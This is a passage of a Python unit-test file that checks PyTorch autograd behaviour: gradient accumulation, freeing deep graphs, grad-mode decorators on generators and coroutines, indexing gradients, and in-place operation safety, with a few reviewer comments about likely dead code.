    self.assertEqual(y.grad, y_grad_expected)
    self.assertEqual(x.grad, x_grad_expected)

    # Listing a non-leaf in `inputs` is an error.
    self.assertRaisesRegex(RuntimeError, 'not a leaf Tensor',
                           lambda: out.backward(torch.ones(2, 2, dtype=torch.double),
                                                create_graph=True, inputs=[x, y, x_nonleaf]))

    # backward doesn't have an allow_unused flag, so the behavior of backward
    # when variable is not part of the graph is as if allow_used were true
    # x.grad will simply be None.
    out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[z])
    self.assertIsNone(z.grad)
def test_dependent_backward(self):
    """Backward through y = x**2 and its dependent z = y**3 at once; the
    leaf grad is the sum of both contributions."""
    x = torch.randn(10, requires_grad=True)
    y = x ** 2
    z = y ** 3

    grad_y = torch.randn(10)
    grad_z = torch.randn(10)
    torch.autograd.backward([y, z], [grad_y, grad_z])

    # dy/dx = 2x, dz/dx = 6x^5
    self.assertEqual(x.grad, 2 * x * grad_y + 6 * x.pow(5) * grad_z)
def test_save_output_nr(self):
    """A tensor's output_nr must survive save_for_backward/saved_tensors."""
    x = torch.randn(10, requires_grad=True)

    class MultiOutputFn(Function):
        @staticmethod
        def forward(ctx, x):
            return x[:5], x[5:]

        @staticmethod
        def backward(ctx, *grad):
            return torch.cat(grad)

    a, b = MultiOutputFn.apply(x)
    # b is the second output of its producing Function.
    self.assertEqual(b.output_nr, 1)

    class TestFn(Function):
        @staticmethod
        def forward(ctx, b):
            ctx.save_for_backward(b)
            return b * 2

        @staticmethod
        def backward(ctx, grad_b):
            # The saved tensor must still report the original output_nr.
            b, = ctx.saved_tensors
            self.assertEqual(b.output_nr, 1)
            # NOTE(review): no explicit return -- backward yields None here;
            # presumably fine for this assertion-only test, but confirm.

    TestFn.apply(b).sum().backward()
def test_free_deep_graph(self):
    """Freeing a 150k-node chain graph must not overflow the C stack."""
    def build_and_drop():
        depth = 150000
        x = torch.randn(1, requires_grad=True)
        node = x.clone()

        # build a "chain" computation graph
        for _ in range(depth):
            node = node + node * 0.000001

        # graph deletion occurs when the above locals go out of scope.
        # In this case `del node` would trigger it, but it's easier to
        # leave it to Python to delete the locals.

    # Should not stack overflow
    build_and_drop()
def test_free_deep_graph_complicated(self):
    """Freeing a deep graph with (intended) skip connections must not
    overflow the stack when the locals are garbage collected."""
    def scope():
        depth = 100000
        randchoice = torch.randint(2, [depth, 2])
        x = torch.randn(1, requires_grad=True)
        y = x.clone()

        # Hold the two previous values
        prev_values = [None, None]

        # Build a "chain with skip connections" graph
        for _ in range(depth):
            # NOTE(review): prev_values[:-1] holds at most one element, so
            # nprev can never reach 2 and the skip-connection branch below
            # looks dead; moreover randchoice[depth] would be out of range
            # if the branch were ever taken. Worth confirming intent.
            prev_tensors = [tensor for tensor in prev_values[:-1]
                            if tensor is not None]
            prev_values.append(y)
            prev_values.pop(0)

            # Definitely pick one tensor to add
            y += y * 0.000001

            # Possibly add other tensors
            nprev = len(prev_tensors)
            if nprev == 2:
                y += randchoice[depth].mul(torch.cat(prev_tensors)).sum()

        # graph deletion occurs when the above locals go out of scope.

    # Should not stack overflow
    scope()
def test_free_deep_graph_pyfunction(self):
    """Deleting a deep graph built from Python autograd Functions must not
    overflow the stack."""
    class MyOp(Function):
        @staticmethod
        def forward(ctx, tensor1, tensor2):
            return tensor1 + tensor2

        @staticmethod
        def backward(ctx, grad_output):
            return grad_output, grad_output

    def build_and_drop():
        x = torch.randn(1, requires_grad=True)
        node = x.clone()

        # build deeply nested computation graph
        for _ in range(150000):
            node = MyOp.apply(node, node)

        # graph deletion occurs when the above locals go out of scope.

    # Should not stack overflow
    build_and_drop()
def test_no_unnecessary_save(self):
    # If we kept x in the derivative Function of x * 2 we would
    # get an error in the backward that would complain that we've
    # modified x, which was needed for gradient computation.
    # Since we should elide unnecessary saves, this test should pass.
    mu = torch.ones(1, requires_grad=True)
    x = torch.empty(1)
    loss = 0
    for i in range(3):
        # reuse the same buffer: detach from the old graph, then overwrite
        x.detach_()
        x.copy_(mu + i)
        ft = torch.tensor([float(i)])
        multiplied = x * ft
        s = multiplied.sum()
        loss += s
    # must not raise a version-counter error despite x being rewritten
    loss.backward()
def test_no_grad(self):
    """torch.no_grad must work both as a context manager and as a
    decorator, producing grad-less outputs either way."""
    x = torch.ones(5, 5, requires_grad=True)
    y = torch.ones(5, 5) * 4

    with torch.no_grad():
        w = x + y

    @torch.no_grad()
    def adder(x, y):
        return x + y

    z = adder(x, y)

    for result in (w, z):
        self.assertFalse(result.requires_grad)
        self.assertRaises(RuntimeError,
                          lambda: result.backward(torch.ones(5, 5)))
        self.assertIsNone(result.grad_fn)

    # test nested decorator and with-statement on no_grad
    with torch.no_grad():
        self.assertFalse(torch.is_grad_enabled())
        w = adder(x, y)
        self.assertFalse(torch.is_grad_enabled())
def test_set_grad_generator_functions(self):
    """Grad-mode decorators on generators must apply inside the generator
    body without leaking into the consuming scope's grad mode."""
    @torch.no_grad()
    def gen_no_grad():
        for i in range(10):
            self.assertEqual(torch.is_grad_enabled(), False)
            yield i

    with torch.enable_grad():
        for _ in gen_no_grad():
            # caller's mode is untouched between yields
            self.assertEqual(torch.is_grad_enabled(), True)

    @torch.enable_grad()
    def gen_enable_grad():
        for i in range(10):
            self.assertEqual(torch.is_grad_enabled(), True)
            yield i

    with torch.no_grad():
        for _ in gen_enable_grad():
            self.assertEqual(torch.is_grad_enabled(), False)
def test_set_grad_generator_functions_recursive(self):
    """Mutually recursive grad-mode decorators/context-managers must each
    restore the caller's setting on return."""
    # enable_grad_decorator_recursive and no_grad_decorator_recursive call each other
    # recursively, to ensure that the decorators preserve the caller's setting
    @torch.enable_grad()
    def enable_grad_decorator_recursive(depth):
        self.assertTrue(torch.is_grad_enabled())
        if depth > 0:
            no_grad_decorator_recursive(depth - 1)
            # mode must be restored after the nested call returns
            self.assertTrue(torch.is_grad_enabled())

    @torch.no_grad()
    def no_grad_decorator_recursive(depth):
        self.assertFalse(torch.is_grad_enabled())
        if depth > 0:
            enable_grad_decorator_recursive(depth - 1)
            self.assertFalse(torch.is_grad_enabled())

    # enable_grad_context_manager_recursive and no_grad_context_manager_recursive call
    # each other recursively, to ensure that the decorators preserve the caller's setting
    def enable_grad_context_manager_recursive(depth):
        with torch.enable_grad():
            self.assertTrue(torch.is_grad_enabled())
            if depth > 0:
                no_grad_context_manager_recursive(depth - 1)
                self.assertTrue(torch.is_grad_enabled())

    def no_grad_context_manager_recursive(depth):
        with torch.no_grad():
            self.assertFalse(torch.is_grad_enabled())
            if depth > 0:
                enable_grad_context_manager_recursive(depth - 1)
                self.assertFalse(torch.is_grad_enabled())

    # Drive both recursions from an enabled and a disabled outer mode.
    with torch.enable_grad():
        self.assertTrue(torch.is_grad_enabled())
        enable_grad_decorator_recursive(10)
        self.assertTrue(torch.is_grad_enabled())
        enable_grad_context_manager_recursive(10)
        self.assertTrue(torch.is_grad_enabled())

    with torch.no_grad():
        self.assertFalse(torch.is_grad_enabled())
        enable_grad_decorator_recursive(10)
        self.assertFalse(torch.is_grad_enabled())
        enable_grad_context_manager_recursive(10)
        self.assertFalse(torch.is_grad_enabled())
def test_set_grad_coroutines(self):
    """Grad-mode decorators on generator 'coroutines' must hold across
    send() inside the generator while the driver keeps its own mode."""
    @torch.no_grad()
    def coro_no_grad(n=10):
        self.assertFalse(torch.is_grad_enabled())
        for i in range(n):
            self.assertFalse(torch.is_grad_enabled())
            r = yield i
            self.assertFalse(torch.is_grad_enabled())
            self.assertEqual(i, r)
        self.assertFalse(torch.is_grad_enabled())

    @torch.enable_grad()
    def coro_enable_grad(n=10):
        self.assertTrue(torch.is_grad_enabled())
        for i in range(n):
            self.assertTrue(torch.is_grad_enabled())
            r = yield i
            self.assertTrue(torch.is_grad_enabled())
            self.assertEqual(i, r)
        self.assertTrue(torch.is_grad_enabled())

    with torch.enable_grad():
        self.assertTrue(torch.is_grad_enabled())
        coro, r = coro_no_grad(), None
        try:
            while True:
                self.assertTrue(torch.is_grad_enabled())
                # echo the yielded value back so the coroutine can check it
                r = coro.send(r)
                self.assertTrue(torch.is_grad_enabled())
        except StopIteration:
            pass

    with torch.no_grad():
        self.assertFalse(torch.is_grad_enabled())
        coro, r = coro_enable_grad(), None
        try:
            while True:
                self.assertFalse(torch.is_grad_enabled())
                r = coro.send(r)
                self.assertFalse(torch.is_grad_enabled())
        except StopIteration:
            pass
def test_set_grad_coroutines_benign_exceptions(self):
    """throw()-ing a recoverable exception into a decorated generator must
    not disturb the grad mode seen inside it."""
    class RecoverableException(Exception):
        pass

    @torch.no_grad()
    def coro_no_grad(n=10):
        has_raised = False
        for i in range(n):
            try:
                self.assertFalse(torch.is_grad_enabled())
                # negative values signal the driver that we recovered
                yield (-i if has_raised else i)
            except RecoverableException:
                self.assertFalse(torch.is_grad_enabled())
                has_raised = True

    @torch.enable_grad()
    def coro_enable_grad(n=10):
        has_raised = False
        for i in range(n):
            try:
                self.assertTrue(torch.is_grad_enabled())
                yield (-i if has_raised else i)
            except RecoverableException:
                self.assertTrue(torch.is_grad_enabled())
                has_raised = True

    with torch.enable_grad():
        coro = coro_no_grad()
        assert 0 == next(coro)
        try:
            while True:
                r = coro.throw(RecoverableException)
                self.assertLess(r, 0)
        except StopIteration:
            pass

    with torch.no_grad():
        coro = coro_enable_grad()
        assert 0 == next(coro)
        try:
            while True:
                r = coro.throw(RecoverableException)
                self.assertLess(r, 0)
        except StopIteration:
            pass
def test_set_grad_coroutines_critical_exceptions(self):
    """A fatal exception thrown into a decorated generator must still see
    the generator's grad mode while handling it."""
    class UnrecoverableException(Exception):
        pass

    class SecondaryException(Exception):
        pass

    @torch.no_grad()
    def coro_no_grad(n=10):
        # NOTE(review): has_raised is never set True on this path (the
        # handler re-raises) -- the ternary below always yields i.
        has_raised = False
        for i in range(n):
            try:
                self.assertFalse(torch.is_grad_enabled())
                yield (-i if has_raised else i)
            except UnrecoverableException:
                self.assertFalse(torch.is_grad_enabled())
                raise SecondaryException

    @torch.enable_grad()
    def coro_enable_grad(n=10):
        has_raised = False
        for i in range(n):
            try:
                self.assertTrue(torch.is_grad_enabled())
                yield (-i if has_raised else i)
            except UnrecoverableException:
                self.assertTrue(torch.is_grad_enabled())
                raise SecondaryException

    with torch.enable_grad():
        coro = coro_no_grad()
        assert 0 == next(coro)
        with self.assertRaises(SecondaryException):
            coro.throw(UnrecoverableException)

    with torch.no_grad():
        coro = coro_enable_grad()
        assert 0 == next(coro)
        with self.assertRaises(SecondaryException):
            coro.throw(UnrecoverableException)
def test_set_grad_coroutines_exit(self):
    """close()-ing a decorated generator must run its GeneratorExit
    handler under the generator's own grad mode."""
    @torch.no_grad()
    def coro_no_grad(state):
        for i in range(10):
            try:
                self.assertFalse(torch.is_grad_enabled())
                yield i
            except GeneratorExit:
                self.assertFalse(torch.is_grad_enabled())
                # record that the exit path actually ran
                state.add('GeneratorExit')
                raise

    @torch.enable_grad()
    def coro_enable_grad(state):
        for i in range(10):
            try:
                self.assertTrue(torch.is_grad_enabled())
                yield i
            except GeneratorExit:
                self.assertTrue(torch.is_grad_enabled())
                state.add('GeneratorExit')
                raise

    state = set()
    with torch.enable_grad():
        coro = coro_no_grad(state)
        for i in range(5):
            next(coro)

        coro.close()
    self.assertTrue('GeneratorExit' in state)

    state = set()
    with torch.no_grad():
        coro = coro_enable_grad(state)
        for i in range(5):
            next(coro)

        coro.close()
    self.assertTrue('GeneratorExit' in state)
def test_no_grad_python_function(self):
    """Python Functions should respect grad mode."""
    x = torch.ones(5, 5, requires_grad=True)

    class MyOp(Function):
        @staticmethod
        def forward(ctx, inp):
            return inp + 1

        @staticmethod
        def backward(ctx, grad_output):
            return grad_output

    with torch.no_grad():
        result = MyOp.apply(x)

    # apply() under no_grad must not record a graph
    self.assertFalse(result.requires_grad)
def test_indexing(self):
    """Gradients through every supported indexing form: basic ints/slices,
    advanced (integer/bool tensor) indexing, and ellipsis."""
    x = torch.arange(1., 17).view(4, 4)
    y = Variable(x, requires_grad=True)

    def compare(x, y, idx, indexed_tensor, indexed_var):
        indexed_var_t = indexed_var.data
        if not isinstance(indexed_tensor, torch.Tensor):
            # scalar result: unwrap to compare against the python number
            indexed_var_t = indexed_var_t[0]
        self.assertEqual(indexed_tensor, indexed_var_t)

        indexed_var.sum().backward()
        # grad is 1 exactly at the indexed positions, 0 elsewhere
        expected_grad = torch.empty(x.size()).fill_(0)
        expected_grad[idx] = 1
        self.assertEqual(y.grad, expected_grad)

    def check_index(x, y, idx):
        if y.grad is not None:
            with torch.no_grad():
                y.grad.zero_()
        indexed_tensor = x[idx]
        indexed_var = y[idx]
        compare(x, y, idx, indexed_tensor, indexed_var)

    check_index(x, y, 1)
    check_index(x, y, (1, 1))
    check_index(x, y, slice(1, None))
    check_index(x, y, slice(None, 2))
    check_index(x, y, (slice(None, 2), 2))
    check_index(x, y, (slice(1, 2), 2))
    check_index(x, y, (1, slice(2, None)))
    check_index(x, y, (slice(None, None), slice(2, None)))
    check_index(x, y, torch.LongTensor([0, 2]))
    check_index(x, y, torch.rand(4, 4).bernoulli().bool())
    check_index(x, y, (Ellipsis, slice(2, None)))
    check_index(x, y, ([0], [0]))
    check_index(x, y, ([1, 2, 3], [0]))
    check_index(x, y, ([1, 2], [2, 1]))
    check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 3]]))
    check_index(x, y, ([slice(None), [2, 3]]))
    check_index(x, y, ([[2, 3], slice(None)]))

    # advanced indexing, with less dim, or ellipsis
    check_index(x, y, ([0]))
    check_index(x, y, ([0], ))

    x = torch.arange(1., 49).view(4, 3, 4)
    y = Variable(x, requires_grad=True)

    check_index(x, y, (slice(None), [0], [0]))
    check_index(x, y, ([0], [0], slice(None)))
    check_index(x, y, (slice(None), [0, 1, 2], [0]))
    check_index(x, y, ([0, 1, 2], [0], slice(None)))
    check_index(x, y, (slice(None), [1, 2], [2, 1]))
    check_index(x, y, ([1, 2], [2, 1], slice(None)))
    check_index(x, y, (slice(None), [[1, 2], [2, 0]], [[0, 1], [2, 3]]))
    check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 2]], slice(None)))
    check_index(x, y, (slice(None), slice(None), [2, 1]))
    check_index(x, y, (slice(None), [2, 1], slice(None)))
    check_index(x, y, ([2, 1], slice(None), slice(None)))

    # advanced indexing, with less dim, or ellipsis
    check_index(x, y, ([0], ))
    check_index(x, y, ([0], slice(None)))
    check_index(x, y, ([0], Ellipsis))
    check_index(x, y, ([1, 2], [0, 1]))
    check_index(x, y, ([1, 2], [0, 1], Ellipsis))
    check_index(x, y, (Ellipsis, [1, 2], [0, 1]))

    # advanced indexing, with a tensor wrapped in a variable
    z = torch.LongTensor([0, 1])
    zv = Variable(z, requires_grad=False)
    seq = [z, Ellipsis]
    seqv = [zv, Ellipsis]

    if y.grad is not None:
        with torch.no_grad():
            y.grad.zero_()
    indexed_tensor = x[seq]
    indexed_var = y[seqv]
    compare(x, y, seq, indexed_tensor, indexed_var)
def test_indexing_duplicates(self):
    """Duplicate indices must *accumulate* gradient, once per occurrence."""
    x = torch.arange(1., 17).view(4, 4)
    y = Variable(x, requires_grad=True)

    idx = torch.LongTensor([1, 1, 3, 2, 1, 2])
    y[idx].sum().backward()
    expected_grad = torch.zeros(4, 4)
    for i in idx:
        expected_grad[i] += 1
    self.assertEqual(y.grad, expected_grad)

    # with advanced indexing
    x = torch.arange(1., 17).view(4, 4)
    y = Variable(x, requires_grad=True)

    idx = [[1, 1, 3, 2, 1, 2], [0]]
    y[idx].sum().backward()
    expected_grad = torch.zeros(4, 4)
    for i in idx[0]:
        for j in idx[1]:
            expected_grad[i][j] += 1

    self.assertEqual(y.grad, expected_grad)

    x = torch.arange(1., 17).view(4, 4)
    y = Variable(x, requires_grad=True)
    idx = [[[1, 2], [0, 0]], [[0, 1], [1, 1]]]
    y[idx].sum().backward()
    # hand-computed accumulation for the 2x2 advanced index above
    expected_grad = torch.tensor([[0., 2., 0., 0.],
                                  [1., 0., 0., 0.],
                                  [0., 1., 0., 0.],
                                  [0., 0., 0., 0.]])
    self.assertEqual(y.grad, expected_grad)

    x = torch.arange(1., 65).view(4, 4, 4)
    y = Variable(x, requires_grad=True)

    idx = [[1, 1, 1], slice(None), slice(None)]
    y[idx].sum().backward()
    expected_grad = torch.empty(4, 4, 4).zero_()
    # row 1 selected three times -> grad of 3 everywhere in that slice
    expected_grad[1].fill_(3)
    self.assertEqual(y.grad, expected_grad)
def test_index_backward_does_not_save_tensor(self):
    # Example from https://github.com/pytorch/pytorch/issues/24853.
    # if `index(tensor, indices)` saves `tensor` for backwards, then it will
    # trigger a version check on `tensor` during the backward pass, which
    # will cause the following code to error because `tensor` gets modified
    # by the indexing line.
    selector = torch.tensor([1., 0, 0])
    base = torch.zeros(3, requires_grad=True)

    tensor = base + 0
    mask = selector != 0
    tensor[mask] = tensor[mask]
    # backward must succeed even though `tensor` was modified in-place
    tensor.backward(torch.zeros_like(tensor))
def test_volatile_deprecated(self):
    """Reading .volatile must return False and warn about the deprecation."""
    # NOTE(review): torch.autograd.torch resolves to the torch module, so
    # this is effectively torch.randn -- presumably a historical accident.
    v = torch.autograd.torch.randn(3, 3)
    with warnings.catch_warnings(record=True) as w:
        self.assertFalse(v.volatile)
    self.assertIn('volatile', str(w[0].message))
def test_saved_variables_deprecated(self):
    """ctx.saved_variables (deprecated alias of ctx.saved_tensors) must
    still work but emit a deprecation warning mentioning it by name."""
    class MyFunction(Function):
        @staticmethod
        def forward(ctx, tensor1, tensor2):
            ctx.save_for_backward(tensor1, tensor2)
            return tensor1 + tensor2

        @staticmethod
        def backward(ctx, grad_output):
            # deprecated spelling -- should warn, yet still yield the tensors
            var1, var2 = ctx.saved_variables
            return (grad_output, grad_output)

    with warnings.catch_warnings(record=True) as warns:
        warnings.simplefilter("always")
        x = torch.randn((3, 3), requires_grad=True)
        y = torch.randn((3, 3), requires_grad=True)
        # call apply on the class directly; no instance is needed
        MyFunction.apply(x, y).sum().backward()

        # any() replaces the previous reduce(map(...)) scan -- same result,
        # builtin-only and short-circuiting.
        has_deprecated = any('deprecated' in str(warn) and
                             'saved_variables' in str(warn)
                             for warn in warns)
        self.assertTrue(has_deprecated)
def test_requires_grad(self):
    """requires_grad must propagate through ops, and backward must never
    visit subgraphs whose tensors do not require grad."""
    x = torch.randn(5, 5)
    y = torch.randn(5, 5)
    z = torch.randn(5, 5, requires_grad=True)
    a = x + y
    self.assertFalse(a.requires_grad)
    b = a + z
    self.assertTrue(b.requires_grad)

    def error():
        raise RuntimeError
    # Make sure backward isn't called on these
    a._backward_hooks = OrderedDict()
    x._backward_hooks = OrderedDict()
    y._backward_hooks = OrderedDict()
    a._backward_hooks['test'] = error
    x._backward_hooks['test'] = error
    y._backward_hooks['test'] = error
    # if the engine touched a/x/y, the hooks above would raise
    b.backward(torch.ones(5, 5))
def test_requires_grad_(self):
    """requires_grad_ returns self and toggles the flag; a non-leaf can
    only ever have it switched on."""
    x = torch.randn(5, 5)
    y = torch.randn(5, 5, requires_grad=True)

    # default argument enables grad on any leaf
    for t in (x, y):
        self.assertIs(t, t.requires_grad_())
        self.assertTrue(t.requires_grad)
    # explicit True is equivalent
    for t in (x, y):
        self.assertIs(t, t.requires_grad_(True))
        self.assertTrue(t.requires_grad)

    z = x * y
    # non-leaf: switching off is forbidden, switching on is a no-op
    self.assertRaises(RuntimeError, lambda: z.requires_grad_(False))
    self.assertIs(z, z.requires_grad_())
    self.assertTrue(z.requires_grad)
    self.assertIs(z, z.requires_grad_(True))
    self.assertTrue(z.requires_grad)

    # leaves can be switched back off
    for t in (x, y):
        self.assertIs(t, t.requires_grad_(False))
        self.assertFalse(t.requires_grad)
def test_requires_grad_inplace(self):
    """In-place adding a requires-grad tensor makes the target require grad."""
    # leaf target
    target = torch.randn(5, 5)
    source = torch.randn(5, 5, requires_grad=True)
    target += source
    self.assertTrue(target.requires_grad)

    # non-leaf target
    target = torch.randn(5, 5) + 0
    source = torch.randn(5, 5, requires_grad=True)
    target += source
    self.assertTrue(target.requires_grad)
def test_no_requires_grad_inplace(self):
    """In-place ops are allowed while requires_grad is False, but raise on
    a leaf (or a view of one) after it starts requiring grad."""
    # basic case, should be able to modify inplace while requires_grad is False
    a = torch.randn(2, 3)
    a.add_(5)
    a.requires_grad = True
    a.sum().backward()
    self.assertEqual(a.grad, torch.ones(2, 3))

    # same but with a view
    a = torch.randn(2, 3)
    b = a[:]
    b.add_(5)
    a.requires_grad = True
    a.sum().backward()
    self.assertEqual(a.grad, torch.ones(2, 3))

    # should fail if requires_grad = True when we modify inplace
    a = torch.randn(2, 3)
    b = a[:]
    a.requires_grad = True
    with self.assertRaises(RuntimeError):
        a.add_(5)
    with self.assertRaises(RuntimeError):
        # the view shares storage with the leaf, so it is rejected too
        b.add_(5)
def test_attribute_deletion(self):
    """`.grad` may be deleted; the core autograd attributes must refuse
    deletion (and `.data` may not be set to None)."""
    x = torch.randn((5, 5), requires_grad=True)
    del x.grad
    self.assertIsNone(x.grad)

    # none of these may be removed from a tensor
    for attr in ('data', 'requires_grad', '_grad_fn', '_backward_hooks'):
        with self.assertRaises(RuntimeError):
            delattr(x, attr)

    with self.assertRaises(TypeError):
        x.data = None
def test_duplicate_backward_root(self):
    """Listing the same root twice accumulates its gradient twice."""
    a = torch.randn(5, 5, requires_grad=True)
    b = torch.randn(5, 5, requires_grad=True)

    prod = a * b
    g = torch.randn_like(prod)
    torch.autograd.backward([prod, prod], [g, g])

    self.assertEqual(a.grad, b * g * 2)
    self.assertEqual(b.grad, a * g * 2)
def test_backward_no_grad(self):
    """A None gradient for a non-scalar root must be rejected."""
    leaf = torch.randn(5, 5, requires_grad=True)
    out = leaf + 2
    self.assertRaises(RuntimeError,
                      lambda: torch.autograd.backward([out], [None]))
def test_backward_twice_with_saved_values(self):
    """A second backward without retain_graph must fail once the saved
    buffers have been freed."""
    src = torch.randn(3, requires_grad=True, dtype=torch.double)
    dst = torch.zeros(3, dtype=torch.double)
    dst[[1, 2]] = src[[1, 1]]
    grad = torch.tensor([1, 1, 1], dtype=torch.double)
    dst.backward(grad)
    self.assertRaisesRegex(RuntimeError, 'Specify retain_graph=True',
                           lambda: dst.backward(grad))
def test_backward_twice_retained_graph_with_saved_values(self):
    """retain_graph=True keeps saved buffers alive for a second backward."""
    src = torch.randn(3, requires_grad=True, dtype=torch.double)
    dst = torch.zeros(3, dtype=torch.double)
    dst[[1, 2]] = src[[1, 1]]
    grad = torch.tensor([1, 1, 1], dtype=torch.double)
    dst.backward(grad, retain_graph=True)
    # second pass must succeed without error
    dst.backward(grad)
def test_backward_twice_without_saved_values(self):
    """A graph that saves nothing may be backwarded twice without
    retain_graph."""
    src = torch.randn(3, requires_grad=True, dtype=torch.double)
    out = src + 1
    grad = torch.tensor([1, 1, 1], dtype=torch.double)
    out.backward(grad)
    out.backward(grad)
def test_backward_twice_retained_graph_without_saved_values(self):
    """retain_graph=True followed by a plain second backward must work."""
    src = torch.randn(3, requires_grad=True, dtype=torch.double)
    dst = torch.zeros(3, dtype=torch.double)
    dst[[1, 2]] = src[[1, 1]]
    grad = torch.tensor([1, 1, 1], dtype=torch.double)
    dst.backward(grad, retain_graph=True)
    dst.backward(grad)
def test_next_functions(self):
    """grad_fn.next_functions must point at the producers: AccumulateGrad
    nodes for leaves, None for plain constants."""
    x = torch.randn(5, 5, requires_grad=True)
    y = torch.randn(5, 5, requires_grad=True)

    a = x + y
    self.assertIsNotNone(a.grad_fn)
    next_functions = a.grad_fn.next_functions
    self.assertEqual(len(next_functions), 2)
    self.assertIsInstance(next_functions[0][0], torch._C._functions.AccumulateGrad)
    self.assertEqual(next_functions[0][1], 0)
    self.assertIsInstance(next_functions[1][0], torch._C._functions.AccumulateGrad)
    self.assertEqual(next_functions[1][1], 0)

    b = a + 5
    next_functions = b.grad_fn.next_functions
    self.assertEqual(len(next_functions), 2)
    self.assertIs(next_functions[0][0], a.grad_fn)
    # the scalar 5 contributes no grad edge
    self.assertIs(next_functions[1][0], None)
def test_inplace(self):
    """In-place ops must be allowed exactly when no consumer saved the
    overwritten value for backward; otherwise backward must raise."""
    x = torch.ones(5, 5, requires_grad=True)
    y = Variable(torch.ones(5, 5) * 4, requires_grad=True)

    z = x * y
    q = z + y
    w = z * y
    z.add_(2)
    # Add doesn't need its inputs to do backward, so it shouldn't raise
    q.backward(torch.ones(5, 5), retain_graph=True)
    # Mul saves both inputs in forward, so it should raise
    self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))

    z = x * y
    q = z * y
    r = z + y
    w = z.add_(y)
    # w is the last expression, so this should succeed
    w.backward(torch.ones(5, 5), retain_graph=True)
    # r doesn't use the modified value in backward, so it should succeed
    r.backward(torch.ones(5, 5), retain_graph=True)
    # q uses dirty z, so it should raise
    self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))

    with torch.no_grad():
        x.grad.zero_()
    m = x / 2
    z = m + y / 8
    q = z * y
    r = z + y
    prev_version = z._version
    w = z.exp_()
    # the in-place exp_ must bump z's version counter
    self.assertNotEqual(z._version, prev_version)
    r.backward(torch.ones(5, 5), retain_graph=True)
    self.assertEqual(x.grad, torch.ones(5, 5) / 2)
    w.backward(torch.ones(5, 5), retain_graph=True)
    self.assertEqual(x.grad, torch.empty(5, 5).fill_((1 + math.e) / 2))
    self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))

    leaf = torch.ones(5, 5, requires_grad=True)
    x = leaf.clone()
    x.add_(10)
    self.assertEqual(x, torch.ones(5, 5) * 11)
    # x should be still usable
    y = x + 2
    y.backward(torch.ones(5, 5))
    self.assertEqual(leaf.grad, torch.ones(5, 5))
    z = x * y
    x.add_(2)
    # z saved the pre-add_ x, so this backward must now fail
    self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
def test_mark_non_differentiable(self):
    """An output marked non-differentiable must not require grad, and
    using it downstream must not break backward."""
    class MyFunction(Function):
        @staticmethod
        def forward(ctx, input):
            result = input > 0
            ctx.mark_non_differentiable(result)
            return result

        @staticmethod
        def backward(ctx, grad_output):
            return (grad_output * 0).to(torch.double)

    x = torch.randn(5, 5, requires_grad=True)
    mask = MyFunction.apply(x)
    self.assertFalse(mask.requires_grad)

    y = x.masked_fill(mask, 0)
    y.sum().backward()
def test_mark_non_differentiable_mixed(self):
    """With one differentiable and one non-differentiable output, backward
    must receive zeros for the marked output and real grads otherwise."""
    class MyFunction(Function):
        @staticmethod
        def forward(ctx, input):
            a = input + 1
            b = input + 2
            ctx.mark_non_differentiable(a)
            return a, b

        @staticmethod
        def backward(ctx, grad_a, grad_b):
            # the marked output gets a zero grad; the live one gets ones
            self.assertTrue((grad_a == 0).all())
            self.assertTrue((grad_b == 1).all())
            return grad_b

    x = torch.randn(5, 5, requires_grad=True)
    a, b = MyFunction.apply(x)
    self.assertFalse(a.requires_grad)
    self.assertTrue(b.requires_grad)
    b.sum().backward()
    self.assertEqual(x.grad, torch.ones(5, 5))
def test_mark_non_differentiable_none(self):
    # This used to segfault because MyFunction would send back null
    # gradients to MulBackward, which is implemented in C++. C++
    # implemented functions expect incoming grad_ouptuts to be non-null.
    class MyFunction(Function):
        @staticmethod
        def forward(ctx, input):
            output = input.clone()
            ctx.mark_non_differentiable(output)
            return output

        @staticmethod
        def backward(ctx, grad_output):
            return None

    x = torch.randn(5, 5, requires_grad=True)
    # route the non-differentiable output into a C++ backward node
    r = MyFunction.apply(x * x)
    (r * x).sum().backward()
def test_return_duplicate(self):
    """A Function returning the same tensor twice must pass gradcheck and
    gradgradcheck, with both outputs aliasing one object."""
    class DoubleDuplicate(Function):
        @staticmethod
        def forward(ctx, x):
            doubled = x * 2
            return doubled, doubled

        @staticmethod
        def backward(ctx, grad1, grad2):
            return grad1 * 2 + grad2 * 2

    def fn(x):
        a, b = DoubleDuplicate.apply(x)
        # both outputs must be the very same tensor object
        self.assertIs(a, b)
        return a + b

    x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
    gradcheck(fn, [x])
    gradgradcheck(fn, [x])
def test_return_duplicate_inplace(self):
    """A Function that mutates its input in-place (mark_dirty) and returns
    it twice must gradcheck; illegal in-place uses must raise."""
    class DoubleInplace(Function):
        @staticmethod
        def forward(ctx, x):
            x.mul_(2)
            ctx.mark_dirty(x)
            return x, x

        @staticmethod
        def backward(ctx, grad1, grad2):
            return grad1 * 2 + grad2 * 2

    def inplace_fn(x):
        # clone so the in-place op never touches the gradcheck leaf
        a, b = DoubleInplace.apply(x.clone())
        self.assertIs(a, b)
        return a + b

    x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
    gradcheck(inplace_fn, [x])
    gradgradcheck(inplace_fn, [x])

    # NOTE(review): InplaceFunction below comes from outside this chunk
    # (an import or earlier definition) -- confirm it is the intended class.
    # Can't modify leaf variables in-place
    self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x))
    # Functions which modify views in-place must return only one output
    self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x.clone()[0]))
@suppress_warnings
def test_resize(self):
    """tensor.resize must hand back a tensor with the requested shape."""
    t = torch.ones(2, 3)
    self.assertTrue(t.resize(3, 2).size() == (3, 2))
def _test_setitem(self, size, index):
    """Helper: `y[index] = const` must bump y's version counter and zero
    the gradient flowing through the overwritten elements."""
    x = torch.ones(*size, requires_grad=True)
    y = x + 2
    y_version = y._version
    y[index] = 2
    # the in-place assignment must be recorded by the version counter
    self.assertNotEqual(y._version, y_version)
    y.backward(torch.ones(*size))
    expected_grad = torch.ones(*size)
    expected_grad[index] = 0
    self.assertEqual(x.grad, expected_grad)
def _test_setitem_tensor(self, size, index):
    """Helper: `y[index] = value` where value requires grad must route
